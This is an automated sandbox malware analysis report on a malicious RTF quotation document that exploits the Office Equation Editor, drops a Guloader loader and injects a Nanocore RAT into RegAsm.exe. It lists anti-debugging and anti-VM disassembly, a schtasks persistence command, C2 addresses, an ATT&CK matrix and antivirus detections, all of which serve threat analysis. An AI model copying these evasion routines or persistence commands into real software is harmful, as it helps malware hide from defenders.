      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\subfolder1\filename1.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Detected RDTSC dummy instruction sequence (likely for instruction hammering)Show sources
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:
      Tries to detect Any.runShow sources
      Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\Public\69577.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: RegAsm.exeBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Tries to detect virtualization through RDTSC time measurementsShow sources
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 0000000000320136 second address: 0000000000320136 instructions:
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000003202DE second address: 000000000032038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032038C second address: 000000000032044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 00000000003205CA second address: 00000000003205F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
      Source: C:\Users\Public\69577.exeRDTSC instruction interceptor: First address: 000000000032497F second address: 000000000032497F instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 00000000002802DE second address: 000000000028038C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b jmp 00007FAD4C762412h 0x0000000d test edi, 48009A78h 0x00000013 push 00000000h 0x00000015 jmp 00007FAD4C762412h 0x00000017 test bx, ax 0x0000001a jmp 00007FAD4C762412h 0x0000001c pushad 0x0000001d mov eax, 000000E8h 0x00000022 cpuid 0x00000024 popad 0x00000025 jmp 00007FAD4C762412h 0x00000027 test bh, ah 0x00000029 push 7F21185Bh 0x0000002e jmp 00007FAD4C762412h 0x00000030 cmp dx, cx 0x00000033 jmp 00007FAD4C762412h 0x00000035 test ax, cx 0x00000038 jmp 00007FAD4C762412h 0x0000003a pushad 0x0000003b lfence 0x0000003e rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 000000000028038C second address: 000000000028044C instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b push 3E17ADE6h 0x00000010 push F21FD920h 0x00000015 jmp 00007FAD4CBC69F2h 0x00000017 test edi, B4CD5B79h 0x0000001d jmp 00007FAD4CBC69F2h 0x0000001f test bx, ax 0x00000022 push 27AA3188h 0x00000027 jmp 00007FAD4CBC69F2h 0x00000029 pushad 0x0000002a mov eax, 00000097h 0x0000002f cpuid 0x00000031 popad 0x00000032 push DFCB8F12h 0x00000037 jmp 00007FAD4CBC69F2h 0x00000039 test bh, ah 0x0000003b push 2D9CC76Ch 0x00000040 jmp 00007FAD4CBC69F2h 0x00000042 cmp dx, cx 0x00000045 jmp 00007FAD4CBC69F2h 0x00000047 test ax, cx 0x0000004a jmp 00007FAD4CBC69F2h 0x0000004c pushad 0x0000004d lfence 0x00000050 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 00000000002805CA second address: 00000000002805F3 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b pop ecx 0x0000000c mov edx, 94CFDCC5h 0x00000011 jmp 00007FAD4C762412h 0x00000013 pushad 0x00000014 mov edi, 0000000Bh 0x00000019 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000281951 second address: 0000000000281951 instructions:
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRDTSC instruction interceptor: First address: 0000000000286AF8 second address: 0000000000286AF8 instructions: 0x00000000 rdtsc 0x00000002 lfence 0x00000005 shl edx, 20h 0x00000008 or edx, eax 0x0000000a popad 0x0000000b sub ebx, esi 0x0000000d inc ebx 0x0000000e jne 00007FAD4C762418h 0x00000010 jmp 00007FAD4C762412h 0x00000012 test eax, 276D876Eh 0x00000017 mov byte ptr [edx+ecx], al 0x0000001a jmp 00007FAD4C762412h 0x0000001c test edx, eax 0x0000001e inc ecx 0x0000001f jne 00007FAD4C76238Eh 0x00000021 mov al, byte ptr [edx+ecx] 0x00000024 add ebx, esi 0x00000026 xor al, byte ptr [ebx] 0x00000028 jmp 00007FAD4C762412h 0x0000002a pushad 0x0000002b lfence 0x0000002e rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00284447 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2348Thread sleep time: -360000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2864Thread sleep time: -180000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2512Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 884Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\System32\taskeng.exe TID: 2160Thread sleep time: -60000s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe TID: 2332Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2384Thread sleep time: -922337203685477s >= -30000s
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B11C2 GetSystemInfo,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System\67c97ffbe01458a63ecb518c7444c1f1\System.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Drawing\6f4f738362752c5d3a2c9234d604784d\System.Drawing.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\assembly\NativeImages_v2.0.50727_32\System.Windows.Forms\c0f9cb97c68eb938bd0b36f7ee90e60f\System.Windows.Forms.ni.dll
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\Framework\v2.0.50727\
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeFile opened: C:\Windows\Microsoft.NET\
      Source: RegAsm.exeBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess information queried: ProcessInformation

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\Public\69577.exeThread information set: HideFromDebugger
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeThread information set: HideFromDebugger
      Source: C:\Users\Public\69577.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess queried: DebugPort
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00284447 rdtsc
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00284C64 LdrInitializeThunk,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00286C05 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00285D6F mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_00286BBA mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_002857CD mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess token adjusted: Debug
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeMemory allocated: page read and write | page guard

      HIPS / PFW / Operating System Protection Evasion:

      barindex
      Writes to foreign memory regionsShow sources
      Source: C:\Users\Public\69577.exeMemory written: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe base: 280000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\69577.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Users\Public\69577.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Users\Public\69577.exe
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service' /xml 'C:\Users\user\AppData\Local\Temp\tmp9445.tmp'
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'schtasks.exe' /create /f /tn 'SMTP Service Task' /xml 'C:\Users\user\AppData\Local\Temp\tmp80F5.tmp'
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exe 0
      Source: C:\Windows\System32\taskeng.exeProcess created: C:\Program Files (x86)\SMTP Service\smtpsvc.exe 'C:\Program Files (x86)\SMTP Service\smtpsvc.exe' 0
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmpBinary or memory string: Program ManagerH
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmpBinary or memory string: Program Manager
      Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
      Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmpBinary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exe`
      Source: RegAsm.exe, 00000006.00000002.2372409017.0000000001180000.00000002.00000001.sdmp, taskeng.exe, 0000000C.00000002.2371495935.00000000007E0000.00000002.00000001.sdmpBinary or memory string: !Progman
      Source: RegAsm.exe, 00000006.00000002.2382511336.000000001DCBD000.00000004.00000001.sdmpBinary or memory string: Program Manager (x86)\SMTP Service\smtpsvc.exehS
      Source: RegAsm.exe, 00000006.00000002.2382730056.000000001E4ED000.00000004.00000001.sdmpBinary or memory string: Program Manager<
      Source: C:\Users\Public\69577.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeRegistry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13 BlobJump to behavior

      Stealing of Sensitive Information:

      barindex
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara matchFile source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE

      Remote Access Functionality:

      barindex
      Detected Nanocore RatShow sources
      Source: RegAsm.exe, 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
      Source: RegAsm.exe, 00000006.00000002.2371329317.0000000000130000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
      Yara detected Nanocore RATShow sources
      Source: Yara matchFile source: 00000006.00000002.2371344330.0000000000140000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: 00000006.00000002.2382867266.000000001F3FF000.00000004.00000001.sdmp, type: MEMORY
      Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2488, type: MEMORY
      Source: Yara matchFile source: 6.2.RegAsm.exe.144629.2.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f41b071.12.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.140000.3.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f416a48.10.raw.unpack, type: UNPACKEDPE
      Source: Yara matchFile source: 6.2.RegAsm.exe.1f4020ad.11.raw.unpack, type: UNPACKEDPE
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B28F6 bind,
      Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\RegAsm.exeCode function: 6_2_007B28C3 bind,

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Spearphishing Link1Exploitation for Client Execution13Scheduled Task/Job1Access Token Manipulation1Disable or Modify Tools11Input Capture11File and Directory Discovery2Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer3Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsCommand and Scripting Interpreter1Registry Run Keys / Startup Folder1Process Injection112Obfuscated Files or Information1LSASS MemorySystem Information Discovery24Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Software Packing1Security Account ManagerQuery Registry1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Registry Run Keys / Startup Folder1Masquerading122NTDSSecurity Software Discovery621Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptVirtualization/Sandbox Evasion23LSA SecretsVirtualization/Sandbox Evasion23SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
      Replication Through Removable MediaLaunchdRc.commonRc.commonAccess Token Manipulation1Cached Domain CredentialsProcess Discovery2VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol113Jamming or Denial of ServiceAbuse Accessibility Features
      External Remote ServicesScheduled TaskStartup ItemsStartup ItemsProcess Injection112DCSyncRemote System Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
      Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobHidden Files and Directories1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      behaviorgraph top1 signatures2 2 Behavior Graph ID: 358179 Sample: QUOTATIONs44888_A2221_TOAN_... Startdate: 25/02/2021 Architecture: WINDOWS Score: 100 61 Snort IDS alert for network traffic (e.g. based on Emerging Threat rules) 2->61 63 Found malware configuration 2->63 65 Malicious sample detected (through community Yara rule) 2->65 67 19 other signatures 2->67 8 EQNEDT32.EXE 17 2->8         started        13 filename1.exe 1 2->13         started        15 taskeng.exe 1 2->15         started        17 2 other processes 2->17 process3 dnsIp4 49 67.199.248.10, 49165, 80 GOOGLE-PRIVATE-CLOUDUS United States 8->49 51 teknik.io 5.79.72.163, 443, 49166 LEASEWEB-NL-AMS-01NetherlandsNL Netherlands 8->51 53 2 other IPs or domains 8->53 37 C:\Users\user\AppData\Local\...\wREzo[1].txt, PE32 8->37 dropped 39 C:\Users\Public\69577.exe, PE32 8->39 dropped 77 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 8->77 19 69577.exe 1 8->19         started        79 Multi AV Scanner detection for dropped file 13->79 22 RegAsm.exe 2 15->22         started        24 smtpsvc.exe 2 15->24         started        file5 signatures6 process7 signatures8 69 Multi AV Scanner detection for dropped file 19->69 71 Writes to foreign memory regions 19->71 73 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 19->73 75 3 other signatures 19->75 26 RegAsm.exe 2 23 19->26         started        31 RegAsm.exe 19->31         started        process9 dnsIp10 55 194.5.98.202, 4488, 49171, 49172 DANILENKODE Netherlands 26->55 57 onedrive.live.com 26->57 59 2 other IPs or domains 26->59 41 C:\Users\user\subfolder1\filename1.exe, PE32 26->41 dropped 43 C:\Users\user\AppData\Roaming\...\run.dat, data 26->43 dropped 45 C:\Users\user\AppData\Local\...\tmp9445.tmp, XML 26->45 dropped 47 C:\Program Files (x86)\...\smtpsvc.exe, PE32 26->47 dropped 81 Tries to detect Any.run 26->81 83 Hides threads from debuggers 26->83 85 Hides that the sample has been downloaded from the Internet (zone.identifier) 26->85 33 schtasks.exe 26->33         started        35 schtasks.exe 26->35         started        87 Detected RDTSC dummy instruction sequence (likely for instruction hammering) 31->87 89 Tries to detect virtualization through RDTSC time measurements 31->89 file11 signatures12 process13

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc39%VirustotalBrowse
      QUOTATIONs44888_A2221_TOAN_TAN_LOC_TRADING_SERVICES_JOINT_STOCKs.doc25%ReversingLabsDocument-RTF.Exploit.MathType

      Dropped Files

      SourceDetectionScannerLabelLink
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%VirustotalBrowse
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%MetadefenderBrowse
      C:\Program Files (x86)\SMTP Service\smtpsvc.exe0%ReversingLabs
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt42%VirustotalBrowse
      C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\wREzo[1].txt28%ReversingLabsWin32.Trojan.Guloader
      C:\Users\user\subfolder1\filename1.exe28%ReversingLabsWin32.Trojan.Guloader
      C:\Users\Public\69577.exe28%ReversingLabsWin32.Trojan.Guloader

      Unpacked PE Files

      SourceDetectionScannerLabelLinkDownload
      6.2.RegAsm.exe.140000.3.unpack100%AviraTR/NanoCore.fadteDownload File

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      0%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      http://ocsp.entrust.net030%URL Reputationsafe
      194.5.98.2020%VirustotalBrowse
      194.5.98.2020%Avira URL Cloudsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.%s.comPA0%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe
      http://ocsp.entrust.net0D0%URL Reputationsafe

      Domains and IPs

      Contacted Domains

